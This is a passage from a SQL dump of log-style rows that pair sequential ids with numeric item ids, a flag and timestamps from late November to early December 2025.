09:40:47'),(96983,1588,1,'2025-11-30','2025-11-30 10:59:42'),(96984,74,1,'2025-11-30','2025-11-30 11:16:04'),(96985,3486,1,'2025-11-30','2025-11-30 11:35:09'),(96986,4950,1,'2025-11-30','2025-11-30 11:48:10'),(96987,68,1,'2025-11-30','2025-11-30 11:48:33'),(96988,2617,1,'2025-11-30','2025-11-30 12:01:51'),(96989,5526,1,'2025-11-30','2025-11-30 12:45:02'),(96990,91,1,'2025-11-30','2025-11-30 13:24:48'),(96991,1774,1,'2025-11-30','2025-11-30 13:34:17'),(96992,5449,1,'2025-11-30','2025-11-30 14:02:32'),(96993,5253,1,'2025-11-30','2025-11-30 14:16:51'),(96994,80,1,'2025-11-30','2025-11-30 14:23:13'),(96995,4785,1,'2025-11-30','2025-11-30 14:31:34'),(96996,4709,1,'2025-11-30','2025-11-30 14:45:04'),(96997,4637,1,'2025-11-30','2025-11-30 15:00:04'),(96998,4382,1,'2025-11-30','2025-11-30 15:13:07'),(96999,3004,1,'2025-11-30','2025-11-30 15:20:44'),(97000,470,1,'2025-11-30','2025-11-30 15:42:04'),(97001,1747,1,'2025-11-30','2025-11-30 15:57:04'),(97002,5248,1,'2025-11-30','2025-11-30 16:12:00'),(97003,5454,1,'2025-11-30','2025-11-30 16:26:39'),(97004,3267,1,'2025-11-30','2025-11-30 16:50:23'),(97005,3051,1,'2025-11-30','2025-11-30 17:06:42'),(97006,5378,1,'2025-11-30','2025-11-30 17:11:23'),(97007,4966,1,'2025-11-30','2025-11-30 17:22:15'),(97008,4950,1,'2025-11-30','2025-11-30 17:35:39'),(97009,3038,1,'2025-11-30','2025-11-30 17:57:15'),(97010,5137,1,'2025-11-30','2025-11-30 18:14:57'),(97011,1592,1,'2025-11-30','2025-11-30 18:28:37'),(97012,5593,1,'2025-11-30','2025-11-30 18:40:23'),(97013,2769,1,'2025-11-30','2025-11-30 18:49:08'),(97014,5363,1,'2025-11-30','2025-11-30 18:57:39'),(97015,5109,1,'2025-11-30','2025-11-30 18:59:51'),(97016,1766,1,'2025-11-30','2025-11-30 19:36:38'),(97017,5454,1,'2025-11-30','2025-11-30 20:02:18'),(97018,3664,1,'2025-11-30','2025-11-30 20:12:16'),(97019,3764,1,'2025-11-30','2025-11-30 20:53:26'),(97020,1770,1,'2025-11-30','2025-11-30 21:19:24'),(97021,3034,1,'2025-11-30','2025-11-30 22:27:54'),(97022,5020,1,'2025-11-30','2025-11-30 22:29:24'),(97023,5397,1,'2025-11-30','2025-11-30 23:20:29'),(97024,3038,1,'2025-11-30','2025-11-30 23:21:37'),(97025,2904,1,'2025-12-01','2025-12-01 00:33:16'),(97026,5549,1,'2025-12-01','2025-12-01 00:37:37'),(97027,4845,1,'2025-12-01','2025-12-01 01:08:07'),(97028,3249,1,'2025-12-01','2025-12-01 02:02:49'),(97029,2296,1,'2025-12-01','2025-12-01 02:12:18'),(97030,5461,1,'2025-12-01','2025-12-01 02:21:04'),(97031,5415,1,'2025-12-01','2025-12-01 02:40:44'),(97032,72,1,'2025-12-01','2025-12-01 02:45:49'),(97033,4622,1,'2025-12-01','2025-12-01 03:00:29'),(97034,5631,1,'2025-12-01','2025-12-01 03:10:54'),(97035,4950,1,'2025-12-01','2025-12-01 03:41:57'),(97036,80,1,'2025-12-01','2025-12-01 03:45:34'),(97037,5062,1,'2025-12-01','2025-12-01 03:52:24'),(97038,1608,1,'2025-12-01','2025-12-01 03:56:22'),(97039,80,1,'2025-12-01','2025-12-01 04:01:04'),(97040,80,1,'2025-12-01','2025-12-01 04:03:45'),(97041,4950,1,'2025-12-01','2025-12-01 04:03:52'),(97042,4950,1,'2025-12-01','2025-12-01 04:04:30'),(97043,4930,1,'2025-12-01','2025-12-01 04:04:46'),(97044,4941,1,'2025-12-01','2025-12-01 04:05:03'),(97045,3541,1,'2025-12-01','2025-12-01 04:29:10'),(97046,3226,1,'2025-12-01','2025-12-01 04:51:35'),(97047,4756,1,'2025-12-01','2025-12-01 05:11:15'),(97048,5259,1,'2025-12-01','2025-12-01 05:14:27'),(97049,72,1,'2025-12-01','2025-12-01 05:16:50'),(97050,4618,1,'2025-12-01','2025-12-01 05:37:25'),(97051,3710,1,'2025-12-01','2025-12-01 05:54:20'),(97052,3486,1,'2025-12-01','2025-12-01 05:55:32'),(97053,3735,1,'2025-12-01','2025-12-01 06:00:40'),(97054,4963,1,'2025-12-01','2025-12-01 06:33:04'),(97055,1594,1,'2025-12-01','2025-12-01 06:50:26'),(97056,5295,1,'2025-12-01','2025-12-01 07:08:37'),(97057,3680,1,'2025-12-01','2025-12-01 07:29:52'),(97058,5512,1,'2025-12-01','2025-12-01 07:51:56'),(97059,1739,1,'2025-12-01','2025-12-01 08:17:15'),(97060,4950,1,'2025-12-01','2025-12-01 08:31:04'),(97061,5457,1,'2025-12-01','2025-12-01 08:39:37'),(97062,3083,1,'2025-12-01','2025-12-01 08:42:44'),(97063,1872,1,'2025-12-01','2025-12-01 09:07:45'),(97064,91,1,'2025-12-01','2025-12-01 09:15:22'),(97065,5420,1,'2025-12-01','2025-12-01 09:26:40'),(97066,84,1,'2025-12-01','2025-12-01 09:39:21'),(97067,4681,1,'2025-12-01','2025-12-01 09:41:53'),(97068,5020,1,'2025-12-01','2025-12-01 09:47:27'),(97069,5464,1,'2025-12-01','2025-12-01 09:50:23'),(97070,5502,1,'2025-12-01','2025-12-01 09:54:44'),(97071,4712,1,'2025-12-01','2025-12-01 10:37:43'),(97072,68,1,'2025-12-01','2025-12-01 10:38:27'),(97073,5397,1,'2025-12-01','2025-12-01 11:39:57'),(97074,2704,1,'2025-12-01','2025-12-01 12:05:27'),(97075,570,1,'2025-12-01','2025-12-01 12:07:42'),(97076,570,1,'2025-12-01','2025-12-01 12:07:45'),(97077,5400,1,'2025-12-01','2025-12-01 12:09:39'),(97078,5310,1,'2025-12-01','2025-12-01 12:28:43'),(97079,1778,1,'2025-12-01','2025-12-01 12:29:45'),(97080,5636,1,'2025-12-01','2025-12-01 13:10:33'),(97081,1582,1,'2025-12-01','2025-12-01 13:22:54'),(97082,5128,1,'2025-12-01','2025-12-01 13:45:26'),(97083,3781,1,'2025-12-01','2025-12-01 14:02:08'),(97084,5639,1,'2025-12-01','2025-12-01 14:25:44'),(97085,72,1,'2025-12-01','2025-12-01 14:27:33'),(97086,5639,1,'2025-12-01','2025-12-01 14:27:39'),(97087,5643,1,'2025-12-01','2025-12-01 14:36:04'),(97088,72,1,'2025-12-01','2025-12-01 14:36:39'),(97089,5643,1,'2025-12-01','2025-12-01 14:37:44'),(97090,4709,1,'2025-12-01','2025-12-01 15:28:41'),(97091,5639,1,'2025-12-01','2025-12-01 15:53:20'),(97092,2813,1,'2025-12-01','2025-12-01 15:57:49'),(97093,4700,1,'2025-12-01','2025-12-01 15:58:48'),(97094,5557,1,'2025-12-01','2025-12-01 16:09:01'),(97095,5639,1,'2025-12-01','2025-12-01 16:31:47'),(97096,5643,1,'2025-12-01','2025-12-01 16:36:19'),(97097,5639,1,'2025-12-01','2025-12-01 16:39:45'),(97098,5639,1,'2025-12-01','2025-12-01 16:40:07'),(97099,5639,1,'2025-12-01','2025-12-01 16:41:06'),(97100,5639,1,'2025-12-01','2025-12-01 16:42:43'),(97101,5639,1,'2025-12-01','2025-12-01 16:43:37'),(97102,5639,1,'2025-12-01','2025-12-01 16:43:40'),(97103,5639,1,'2025-12-01','2025-12-01 16:44:02'),(97104,5639,1,'2025-12-01','2025-12-01 16:44:20'),(97105,5639,1,'2025-12-01','2025-12-01 16:44:21'),(97106,5639,1,'2025-12-01','2025-12-01 16:44:23'),(97107,5639,1,'2025-12-01','2025-12-01 16:44:38'),(97108,5639,1,'2025-12-01','2025-12-01 16:44:42'),(97109,5639,1,'2025-12-01','2025-12-01 16:45:19'),(97110,5639,1,'2025-12-01','2025-12-01 16:45:29'),(97111,5639,1,'2025-12-01','2025-12-01 16:45:47'),(97112,5639,1,'2025-12-01','2025-12-01 16:45:55'),(97113,5639,1,'2025-12-01','2025-12-01 16:46:03'),(97114,5639,1,'2025-12-01','2025-12-01 16:46:08'),(97115,5639,1,'2025-12-01','2025-12-01 16:46:13'),(97116,5639,1,'2025-12-01','2025-12-01 16:46:13'),(97117,74,1,'2025-12-01','2025-12-01 16:46:41'),(97118,5639,1,'2025-12-01','2025-12-01 16:47:01'),(97119,5639,1,'2025-12-01','2025-12-01 16:47:05'),(97120,5639,1,'2025-12-01','2025-12-01 16:47:14'),(97121,5639,1,'2025-12-01','2025-12-01 16:48:13'),(97122,5639,1,'2025-12-01','2025-12-01 16:48:31'),(97123,5639,1,'2025-12-01','2025-12-01 16:49:01'),(97124,5639,1,'2025-12-01','2025-12-01 16:49:04'),(97125,5639,1,'2025-12-01','2025-12-01 16:49:12'),(97126,5639,1,'2025-12-01','2025-12-01 16:49:18'),(97127,5639,1,'2025-12-01','2025-12-01 16:50:58'),(97128,5639,1,'2025-12-01','2025-12-01 16:51:38'),(97129,5639,1,'2025-12-01','2025-12-01 16:51:50'),(97130,5639,1,'2025-12-01','2025-12-01 16:52:33'),(97131,5639,1,'2025-12-01','2025-12-01 16:52:38'),(97132,5639,1,'2025-12-01','2025-12-01 16:52:41'),(97133,5639,1,'2025-12-01','2025-12-01 16:53:06'),(97134,5639,1,'2025-12-01','2025-12-01 16:53:15'),(97135,5639,1,'2025-12-01','2025-12-01 16:53:34'),(97136,5639,1,'2025-12-01','2025-12-01 16:53:36'),(97137,5639,1,'2025-12-01','2025-12-01 16:54:01'),(97138,5639,1,'2025-12-01','2025-12-01 16:55:01'),(97139,5639,1,'2025-12-01','2025-12-01 16:55:34'),(97140,5639,1,'2025-12-01','2025-12-01 16:55:37'),(97141,5639,1,'2025-12-01','2025-12-01 16:55:52'),(97142,5639,1,'2025-12-01','2025-12-01 16:55:58'),(97143,5639,1,'2025-12-01','2025-12-01 16:56:27'),(97144,5639,1,'2025-12-01','2025-12-01 16:56:50'),(97145,5639,1,'2025-12-01','2025-12-01 16:57:46'),(97146,5639,1,'2025-12-01','2025-12-01 16:58:05'),(97147,108,1,'2025-12-01','2025-12-01 16:59:13'),(97148,5639,1,'2025-12-01','2025-12-01 16:59:19'),(97149,5639,1,'2025-12-01','2025-12-01 17:00:12'),(97150,5639,1,'2025-12-01','2025-12-01 17:00:32'),(97151,5639,1,'2025-12-01','2025-12-01 17:00:45'),(97152,5639,1,'2025-12-01','2025-12-01 17:02:03'),(97153,5639,1,'2025-12-01','2025-12-01 17:02:47'),(97154,5639,1,'2025-12-01','2025-12-01 17:02:52'),(97155,5639,1,'2025-12-01','2025-12-01 17:02:58'),(97156,5639,1,'2025-12-01','2025-12-01 17:03:12'),(97157,5639,1,'2025-12-01','2025-12-01 17:03:19'),(97158,5639,1,'2025-12-01','2025-12-01 17:03:27'),(97159,5639,1,'2025-12-01','2025-12-01 17:03:39'),(97160,5639,1,'2025-12-01','2025-12-01 17:03:42'),(97161,5639,1,'2025-12-01','2025-12-01 17:05:16'),(97162,5639,1,'2025-12-01','2025-12-01 17:05:33'),(97163,5639,1,'2025-12-01','2025-12-01 17:05:34'),(97164,2813,1,'2025-12-01','2025-12-01 17:05:43'),(97165,5639,1,'2025-12-01','2025-12-01 17:05:52'),(97166,5639,1,'2025-12-01','2025-12-01 17:06:11'),(97167,5639,1,'2025-12-01','2025-12-01 17:06:23'),(97168,5639,1,'2025-12-01','2025-12-01 17:06:23'),(97169,5639,1,'2025-12-01','2025-12-01 17:06:25'),(97170,5639,1,'2025-12-01','2025-12-01 17:07:01'),(97171,5639,1,'2025-12-01','2025-12-01 17:07:16'),(97172,3430,1,'2025-12-01','2025-12-01 17:07:22'),(97173,76,1,'2025-12-01','2025-12-01 17:07:36'),(97174,5639,1,'2025-12-01','2025-12-01 17:08:02'),(97175,5639,1,'2025-12-01','2025-12-01 17:08:09'),(97176,76,1,'2025-12-01','2025-12-01 17:09:09'),(97177,5639,1,'2025-12-01','2025-12-01 17:10:12'),(97178,5639,1,'2025-12-01','2025-12-01 17:11:29'),(97179,5639,1,'2025-12-01','2025-12-01 17:11:32'),(97180,5639,1,'2025-12-01','2025-12-01 17:12:04'),(97181,5639,1,'2025-12-01','2025-12-01 17:12:38'),(97182,5639,1,'2025-12-01','2025-12-01 17:13:33'),(97183,5639,1,'2025-12-01','2025-12-01 17:13:51'),(97184,5639,1,'2025-12-01','2025-12-01 17:13:59'),(97185,5639,1,'2025-12-01','2025-12-01 17:16:27'),(97186,5639,1,'2025-12-01','2025-12-01 17:16:46'),(97187,5639,1,'2025-12-01','2025-12-01 17:16:52'),(97188,5639,1,'2025-12-01','2025-12-01 17:17:17'),(97189,5639,1,'2025-12-01','2025-12-01 17:18:48'),(97190,5639,1,'2025-12-01','2025-12-01 17:19:38'),(97191,5639,1,'2025-12-01','2025-12-01 17:19:57'),(97192,5639,1,'2025-12-01','2025-12-01 17:20:12'),(97193,5639,1,'2025-12-01','2025-12-01 17:20:52'),(97194,5639,1,'2025-12-01','2025-12-01 17:21:23'),(97195,5639,1,'2025-12-01','2025-12-01 17:21:26'),(97196,5639,1,'2025-12-01','2025-12-01 17:21:37'),(97197,5639,1,'2025-12-01','2025-12-01 17:22:01'),(97198,5639,1,'2025-12-01','2025-12-01 17:22:09'),(97199,5639,1,'2025-12-01','2025-12-01 17:22:22'),(97200,5639,1,'2025-12-01','2025-12-01 17:22:48'),(97201,5639,1,'2025-12-01','2025-12-01 17:23:32'),(97202,5639,1,'2025-12-01','2025-12-01 17:23:52'),(97203,5639,1,'2025-12-01','2025-12-01 17:24:06'),(97204,5639,1,'2025-12-01','2025-12-01 17:24:24'),(97205,5639,1,'2025-12-01','2025-12-01 17:24:28'),(97206,5639,1,'2025-12-01','2025-12-01 17:24:36'),(97207,68,1,'2025-12-01','2025-12-01 17:25:42'),(97208,5131,1,'2025-12-01','2025-12-01 17:25:52'),(97209,5639,1,'2025-12-01','2025-12-01 17:26:04'),(97210,5639,1,'2025-12-01','2025-12-01 17:26:07'),(97211,3749,1,'2025-12-01','2025-12-01 17:26:12'),(97212,5639,1,'2025-12-01','2025-12-01 17:27:30'),(97213,5639,1,'2025-12-01','2025-12-01 17:27:47'),(97214,5639,1,'2025-12-01','2025-12-01 17:27:50'),(97215,5639,1,'2025-12-01','2025-12-01 17:28:38'),(97216,5639,1,'2025-12-01','2025-12-01 17:29:01'),(97217,5639,1,'2025-12-01','2025-12-01 17:29:03'),(97218,5639,1,'2025-12-01','2025-12-01 17:29:26'),(97219,3738,1,'2025-12-01','2025-12-01 17:29:36'),(97220,5639,1,'2025-12-01','2025-12-01 17:29:37'),(97221,5639,1,'2025-12-01','2025-12-01 17:30:22'),(97222,5639,1,'2025-12-01','2025-12-01 17:30:33'),(97223,5639,1,'2025-12-01','2025-12-01 17:31:11'),(97224,5639,1,'2025-12-01','2025-12-01 17:31:37'),(97225,5639,1,'2025-12-01','2025-12-01 17:31:46'),(97226,5639,1,'2025-12-01','2025-12-01 17:32:35'),(97227,5639,1,'2025-12-01','2025-12-01 17:33:05'),(97228,5639,1,'2025-12-01','2025-12-01 17:34:09'),(97229,5639,1,'2025-12-01','2025-12-01 17:35:19'),(97230,5639,1,'2025-12-01','2025-12-01 17:35:28'),(97231,5639,1,'2025-12-01','2025-12-01 17:36:38'),(97232,5639,1,'2025-12-01','2025-12-01 17:37:47'),(97233,5639,1,'2025-12-01','2025-12-01 17:38:15'),(97234,5639,1,'2025-12-01','2025-12-01 17:38:17'),(97235,5639,1,'2025-12-01','2025-12-01 17:39:23'),(97236,5639,1,'2025-12-01','2025-12-01 17:40:18'),(97237,5639,1,'2025-12-01','2025-12-01 17:40:48'),(97238,5639,1,'2025-12-01','2025-12-01 17:41:02'),(97239,5639,1,'2025-12-01','2025-12-01 17:43:33'),(97240,5639,1,'2025-12-01','2025-12-01 17:43:57'),(97241,5639,1,'2025-12-01','2025-12-01 17:43:58'),(97242,5639,1,'2025-12-01','2025-12-01 17:44:08'),(97243,5639,1,'2025-12-01','2025-12-01 17:44:19'),(97244,5639,1,'2025-12-01','2025-12-01 17:44:52'),(97245,5639,1,'2025-12-01','2025-12-01 17:49:38'),(97246,5639,1,'2025-12-01','2025-12-01 17:50:33'),(97247,5639,1,'2025-12-01','2025-12-01 17:51:45'),(97248,5639,1,'2025-12-01','2025-12-01 17:52:18'),(97249,5639,1,'2025-12-01','2025-12-01 17:52:44'),(97250,5639,1,'2025-12-01','2025-12-01 17:53:29'),(97251,5639,1,'2025-12-01','2025-12-01 17:53:29'),(97252,2904,1,'2025-12-01','2025-12-01 17:53:35'),(97253,5639,1,'2025-12-01','2025-12-01 17:53:59'),(97254,5639,1,'2025-12-01','2025-12-01 17:54:30'),(97255,5639,1,'2025-12-01','2025-12-01 17:54:57'),(97256,5639,1,'2025-12-01','2025-12-01 17:55:42'),(97257,5639,1,'2025-12-01','2025-12-01 17:58:30'),(97258,5639,1,'2025-12-01','2025-12-01 17:58:59'),(97259,5639,1,'2025-12-01','2025-12-01 17:59:05'),(97260,5639,1,'2025-12-01','2025-12-01 17:59:54'),(97261,5639,1,'2025-12-01','2025-12-01 18:00:05'),(97262,5639,1,'2025-12-01','2025-12-01 18:00:22'),(97263,5639,1,'2025-12-01','2025-12-01 18:04:53'),(97264,5639,1,'2025-12-01','2025-12-01 18:05:39'),(97265,5639,1,'2025-12-01','2025-12-01 18:05:39'),(97266,5639,1,'2025-12-01','2025-12-01 18:05:56'),(97267,5639,1,'2025-12-01','2025-12-01 18:06:18'),(97268,5639,1,'2025-12-01','2025-12-01 18:07:03'),(97269,5639,1,'2025-12-01','2025-12-01 18:07:44'),(97270,5639,1,'2025-12-01','2025-12-01 18:12:28'),(97271,5639,1,'2025-12-01','2025-12-01 18:13:00'),(97272,5639,1,'2025-12-01','2025-12-01 18:13:25'),(97273,5639,1,'2025-12-01','2025-12-01 18:14:18'),(97274,5639,1,'2025-12-01','2025-12-01 18:15:23'),(97275,5639,1,'2025-12-01','2025-12-01 18:16:11'),(97276,5639,1,'2025-12-01','2025-12-01 18:16:34'),(97277,5639,1,'2025-12-01','2025-12-01 18:17:24'),(97278,5639,1,'2025-12-01','2025-12-01 18:19:24'),(97279,5639,1,'2025-12-01','2025-12-01 18:20:13'),(97280,5639,1,'2025-12-01','2025-12-01 18:20:16'),(97281,5639,1,'2025-12-01','2025-12-01 18:21:44'),(97282,5639,1,'2025-12-01','2025-12-01 18:23:47'),(97283,5639,1,'2025-12-01','2025-12-01 18:26:37'),(97284,5639,1,'2025-12-01','2025-12-01 18:27:02'),(97285,5639,1,'2025-12-01','2025-12-01 18:29:05'),(97286,5639,1,'2025-12-01','2025-12-01 18:29:15'),(97287,5639,1,'2025-12-01','2025-12-01 18:30:01'),(97288,5639,1,'2025-12-01','2025-12-01 18:30:08'),(97289,5639,1,'2025-12-01','2025-12-01 18:30:29'),(97290,5639,1,'2025-12-01','2025-12-01 18:31:29'),(97291,5639,1,'2025-12-01','2025-12-01 18:31:29'),(97292,2904,1,'2025-12-01','2025-12-01 18:32:07'),(97293,102,1,'2025-12-01','2025-12-01 18:32:31'),(97294,5639,1,'2025-12-01','2025-12-01 18:33:20'),(97295,5639,1,'2025-12-01','2025-12-01 18:34:54'),(97296,5639,1,'2025-12-01','2025-12-01 18:35:32'),(97297,91,1,'2025-12-01','2025-12-01 18:35:36'),(97298,5639,1,'2025-12-01','2025-12-01 18:35:59'),(97299,5639,1,'2025-12-01','2025-12-01 18:36:09'),(97300,5639,1,'2025-12-01','2025-12-01 18:36:22'),(97301,5409,1,'2025-12-01','2025-12-01 18:36:37'),(97302,2658,1,'2025-12-01','2025-12-01 18:37:56'),(97303,5639,1,'2025-12-01','2025-12-01 18:38:25'),(97304,5639,1,'2025-12-01','2025-12-01 18:39:04'),(97305,5639,1,'2025-12-01','2025-12-01 18:39:53'),(97306,5639,1,'2025-12-01','2025-12-01 18:39:59'),(97307,5639,1,'2025-12-01','2025-12-01 18:40:56'),(97308,5639,1,'2025-12-01','2025-12-01 18:42:14'),(97309,1582,1,'2025-12-01','2025-12-01 18:42:15'),(97310,5639,1,'2025-12-01','2025-12-01 18:42:15'),(97311,5639,1,'2025-12-01','2025-12-01 18:42:17'),(97312,2904,1,'2025-12-01','2025-12-01 18:43:18'),(97313,5639,1,'2025-12-01','2025-12-01 18:43:57'),(97314,2904,1,'2025-12-01','2025-12-01 18:44:04'),(97315,5639,1,'2025-12-01','2025-12-01 18:44:34'),(97316,2904,1,'2025-12-01','2025-12-01 18:44:34'),(97317,5639,1,'2025-12-01','2025-12-01 18:44:36'),(97318,2904,1,'2025-12-01','2025-12-01 18:45:14'),(97319,102,1,'2025-12-01','2025-12-01 18:46:14'),(97320,5449,1,'2025-12-01','2025-12-01 18:46:51'),(97321,2904,1,'2025-12-01','2025-12-01 18:47:17'),(97322,102,1,'2025-12-01','2025-12-01 18:47:24'),(97323,2904,1,'2025-12-01','2025-12-01 18:47:28'),(97324,5639,1,'2025-12-01','2025-12-01 18:47:32'),(97325,5639,1,'2025-12-01','2025-12-01 18:47:57'),(97326,5639,1,'2025-12-01','2025-12-01 18:50:31'),(97327,5639,1,'2025-12-01','2025-12-01 18:52:37'),(97328,5639,1,'2025-12-01','2025-12-01 18:53:13'),(97329,5639,1,'2025-12-01','2025-12-01 18:54:43'),(97330,5639,1,'2025-12-01','2025-12-01 18:56:43'),(97331,5639,1,'2025-12-01','2025-12-01 18:57:25'),(97332,5639,1,'2025-12-01','2025-12-01 18:57:44'),(97333,5639,1,'2025-12-01','2025-12-01 18:57:54'),(97334,5639,1,'2025-12-01','2025-12-01 18:58:48'),(97335,5639,1,'2025-12-01','2025-12-01 18:58:49'),(97336,5639,1,'2025-12-01','2025-12-01 18:59:58'),(97337,5639,1,'2025-12-01','2025-12-01 19:00:17'),(97338,5639,1,'2025-12-01','2025-12-01 19:01:13'),(97339,5639,1,'2025-12-01','2025-12-01 19:01:14'),(97340,5639,1,'2025-12-01','2025-12-01 19:05:03'),(97341,5639,1,'2025-12-01','2025-12-01 19:06:50'),(97342,5639,1,'2025-12-01','2025-12-01 19:07:45'),(97343,5639,1,'2025-12-01','2025-12-01 19:10:40'),(97344,5428,1,'2025-12-01','2025-12-01 19:13:33'),(97345,5639,1,'2025-12-01','2025-12-01 19:13:53'),(97346,5639,1,'2025-12-01','2025-12-01 19:15:28'),(97347,5639,1,'2025-12-01','2025-12-01 19:16:13'),(97348,5639,1,'2025-12-01','2025-12-01 19:16:52'),(97349,5163,1,'2025-12-01','2025-12-01 19:21:51'),(97350,5639,1,'2025-12-01','2025-12-01 19:26:24'),(97351,5639,1,'2025-12-01','2025-12-01 19:27:05'),(97352,4830,1,'2025-12-01','2025-12-01 19:27:14'),(97353,5639,1,'2025-12-01','2025-12-01 19:27:46'),(97354,5639,1,'2025-12-01','2025-12-01 19:28:40'),(97355,5639,1,'2025-12-01','2025-12-01 19:28:42'),(97356,5639,1,'2025-12-01','2025-12-01 19:28:56'),(97357,5639,1,'2025-12-01','2025-12-01 19:31:33'),(97358,5639,1,'2025-12-01','2025-12-01 19:32:00'),(97359,5639,1,'2025-12-01','2025-12-01 19:32:40'),(97360,5639,1,'2025-12-01','2025-12-01 19:32:44'),(97361,5639,1,'2025-12-01','2025-12-01 19:46:46'),(97362,5639,1,'2025-12-01','2025-12-01 19:47:08'),(97363,3307,1,'2025-12-01','2025-12-01 19:49:37'),(97364,5639,1,'2025-12-01','2025-12-01 19:55:13'),(97365,5639,1,'2025-12-01','2025-12-01 19:55:55'),(97366,5639,1,'2025-12-01','2025-12-01 20:01:43'),(97367,5639,1,'2025-12-01','2025-12-01 20:04:25'),(97368,5639,1,'2025-12-01','2025-12-01 20:07:03'),(97369,5639,1,'2025-12-01','2025-12-01 20:10:35'),(97370,5639,1,'2025-12-01','2025-12-01 20:10:48'),(97371,5639,1,'2025-12-01','2025-12-01 20:10:51'),(97372,5639,1,'2025-12-01','2025-12-01 20:18:11'),(97373,5639,1,'2025-12-01','2025-12-01 20:28:36'),(97374,4858,1,'2025-12-01','2025-12-01 20:28:47'),(97375,5639,1,'2025-12-01','2025-12-01 20:34:41'),(97376,5639,1,'2025-12-01','2025-12-01 20:35:06'),(97377,5639,1,'2025-12-01','2025-12-01 20:35:55'),(97378,5639,1,'2025-12-01','2025-12-01 20:38:00'),(97379,1608,1,'2025-12-01','2025-12-01 20:38:35'),(97380,68,1,'2025-12-01','2025-12-01 20:41:39'),(97381,5639,1,'2025-12-01','2025-12-01 20:41:49'),(97382,5639,1,'2025-12-01','2025-12-01 20:44:40'),(97383,4668,1,'2025-12-01','2025-12-01 20:46:15'),(97384,3247,1,'2025-12-01','2025-12-01 20:50:01'),(97385,5639,1,'2025-12-01','2025-12-01 20:58:00'),(97386,3781,1,'2025-12-01','2025-12-01 20:59:41'),(97387,5639,1,'2025-12-01','2025-12-01 21:00:09'),(97388,1782,1,'2025-12-01','2025-12-01 21:03:55'),(97389,5639,1,'2025-12-01','2025-12-01 21:04:59'),(97390,5639,1,'2025-12-01','2025-12-01 21:09:34'),(97391,5397,1,'2025-12-01','2025-12-01 21:12:57'),(97392,5639,1,'2025-12-01','2025-12-01 21:15:01'),(97393,5639,1,'2025-12-01','2025-12-01 21:16:57'),(97394,5639,1,'2025-12-01','2025-12-01 21:23:19'),(97395,4944,1,'2025-12-01','2025-12-01 21:24:15'),(97396,2904,1,'2025-12-01','2025-12-01 21:24:16'),(97397,5639,1,'2025-12-01','2025-12-01 21:24:44'),(97398,5639,1,'2025-12-01','2025-12-01 21:31:21'),(97399,5639,1,'2025-12-01','2025-12-01 21:33:49'),(97400,5639,1,'2025-12-01','2025-12-01 21:34:20'),(97401,5639,1,'2025-12-01','2025-12-01 21:42:49'),(97402,5515,1,'2025-12-01','2025-12-01 21:45:20'),(97403,5639,1,'2025-12-01','2025-12-01 21:47:11'),(97404,5639,1,'2025-12-01','2025-12-01 21:48:24'),(97405,5639,1,'2025-12-01','2025-12-01 21:49:25'),(97406,89,1,'2025-12-01','2025-12-01 21:51:56'),(97407,5639,1,'2025-12-01','2025-12-01 21:55:19'),(97408,5639,1,'2025-12-01','2025-12-01 21:56:14'),(97409,5639,1,'2025-12-01','2025-12-01 21:58:16'),(97410,5639,1,'2025-12-01','2025-12-01 21:58:50'),(97411,5433,1,'2025-12-01','2025-12-01 21:59:38'),(97412,4424,1,'2025-12-01','2025-12-01 22:04:43'),(97413,5582,1,'2025-12-01','2025-12-01 22:07:49'),(97414,5639,1,'2025-12-01','2025-12-01 22:07:56'),(97415,5639,1,'2025-12-01','2025-12-01 22:08:45'),(97416,4587,1,'2025-12-01','2025-12-01 22:18:21'),(97417,4587,1,'2025-12-01','2025-12-01 22:19:28'),(97418,5639,1,'2025-12-01','2025-12-01 22:22:54'),(97419,5639,1,'2025-12-01','2025-12-01 22:24:05'),(97420,76,1,'2025-12-01','2025-12-01 22:30:20'),(97421,89,1,'2025-12-01','2025-12-01 22:43:51'),(97422,3117,1,'2025-12-01','2025-12-01 22:56:14'),(97423,4719,1,'2025-12-01','2025-12-01 23:09:00'),(97424,4719,1,'2025-12-01','2025-12-01 23:09:08'),(97425,5639,1,'2025-12-01','2025-12-01 23:30:08'),(97426,5639,1,'2025-12-01','2025-12-01 23:36:37'),(97427,5639,1,'2025-12-01','2025-12-01 23:38:57'),(97428,5639,1,'2025-12-01','2025-12-01 23:40:11'),(97429,5639,1,'2025-12-01','2025-12-01 23:49:36'),(97430,4639,1,'2025-12-01','2025-12-01 23:51:28'),(97431,5639,1,'2025-12-02','2025-12-02 00:29:44'),(97432,5601,1,'2025-12-02','2025-12-02 00:30:12'),(97433,74,1,'2025-12-02','2025-12-02 00:30:24'),(97434,87,1,'2025-12-02','2025-12-02 00:34:26'),(97435,2704,1,'2025-12-02','2025-12-02 00:35:29'),(97436,5484,1,'2025-12-02','2025-12-02 00:42:25'),(97437,1582,1,'2025-12-02','2025-12-02 00:45:11'),(97438,3097,1,'2025-12-02','2025-12-02 00:45:49'),(97439,5639,1,'2025-12-02','2025-12-02 00:46:05'),(97440,2748,1,'2025-12-02','2025-12-02 00:50:08'),(97441,5585,1,'2025-12-02','2025-12-02 01:00:24'),(97442,5512,1,'2025-12-02','2025-12-02 01:02:36'),(97443,5256,1,'2025-12-02','2025-12-02 01:04:40'),(97444,5457,1,'2025-12-02','2025-12-02 01:05:56'),(97445,5639,1,'2025-12-02','2025-12-02 01:33:15'),(97446,472,1,'2025-12-02','2025-12-02 01:49:57'),(97447,3102,1,'2025-12-02','2025-12-02 02:03:39'),(97448,5489,1,'2025-12-02','2025-12-02 03:16:13'),(97449,3249,1,'2025-12-02','2025-12-02 03:34:50'),(97450,5639,1,'2025-12-02','2025-12-02 03:44:05'),(97451,5639,1,'2025-12-02','2025-12-02 03:45:05'),(97452,5639,1,'2025-12-02','2025-12-02 03:46:10'),(97453,3781,1,'2025-12-02','2025-12-02 03:56:32'),(97454,3721,1,'2025-12-02','2025-12-02 04:11:40'),(97455,4830,1,'2025-12-02','2025-12-02 04:23:57'),(97456,477,1,'2025-12-02','2025-12-02 04:39:26'),(97457,5639,1,'2025-12-02','2025-12-02 05:08:50'),(97458,3045,1,'2025-12-02','2025-12-02 05:09:59'),(97459,76,1,'2025-12-02','2025-12-02 05:12:58'),(97460,5601,1,'2025-12-02','2025-12-02 05:15:08'),(97461,84,1,'2025-12-02','2025-12-02 05:17:17'),(97462,89,1,'2025-12-02','2025-12-02 05:17:17'),(97463,5643,1,'2025-12-02','2025-12-02 05:49:50'),(97464,5639,1,'2025-12-02','2025-12-02 05:51:58'),(97465,1582,1,'2025-12-02','2025-12-02 05:58:23'),(97466,1612,1,'2025-12-02','2025-12-02 06:03:00'),(97467,4637,1,'2025-12-02','2025-12-02 